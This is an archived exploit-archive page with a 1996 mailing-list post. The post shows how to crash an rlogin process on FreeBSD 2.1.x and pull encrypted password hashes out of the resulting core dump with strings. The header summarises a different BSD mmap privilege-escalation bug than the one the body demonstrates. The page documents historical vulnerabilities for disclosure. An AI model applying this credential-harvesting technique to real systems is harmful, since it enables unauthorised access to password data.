*BSD (and others) SetUID core vulnerabilities

Summary
Description:A 4.4BSD problem allows a read-only descriptor to a char device to be mmap()ed in RW mode. This can allow group kmem to become root and root to lower the system secure-level.
Author:Theo de Raadt and Chuck Cranor
Compromise:User kmem-> root ->modify secure-level->delete audit trail and load evil kernel mods.
Vulnerable Systems:OpenBSD 2.2 and below, FreeBSD 2.2.5 and below, BSDI 3.0 and NetBSD.
Date:17 February 1996 for this posting
Details

Exploit:

---------- Forwarded message ----------
If the following is already known, my deepest apologies for the junk mail..

RECONSTRUCT PARTS OF UN-SHADOWED PASSWORDFILE ON (at least) FreeBSD
2.1.0,2.1.5:

Bronc Buster wrote:

>This exploit is very similer to the FTP exploit on BSD that creates a
>ftp.core file you can then strings and get the encrypted password file.
....snip...snip..

I tried this technique on my FreeBSD 2.1.0 box. It didn't work. I started
playing around with dump files:

~> rlogin 127.0.0.1
Password:
Last login: Mon Feb 17 00:35:49 from localhost
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
        The Regents of the University of California.   All rights reserved.

FreeBSD 2.1.0-RELEASE (WIPS) #0: Thu Oct 17 03:37:25 SAT 1996

You have new mail.

~> ps -ax | grep rlogin
 6528  ??  S      0:00.06 rlogind
 6527  p1  S+     0:00.05 rlogin 127.0.0.1
 6529  p1  S+     0:00.01 rlogin 127.0.0.1

~> kill -11 6529~> ls
Brain_Box       NS              cronjobs        mail            security
Mail            News            foon            rlogin.core
~>strings rlogin.core > unshadowed.passwdfile.reconstruct
~>vi unshadowed.passwdfile.reconstruct
and reconstruct..

I also tried this on a FreeBSD 2.1.5 box, and it did the same thing. I
wonder if there is a way to make a core dump only readable by root, and why
this isn't the default?


=========================================================================
 Roelof W Temmingh                         Network & Data Security
                                           Nanoteq
 rt@nanoteq.com [w]                        South-Africa
 roelof@cube.nanoteq.co.za [ah]            http://www.nanoteq.com
=========================================================================


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]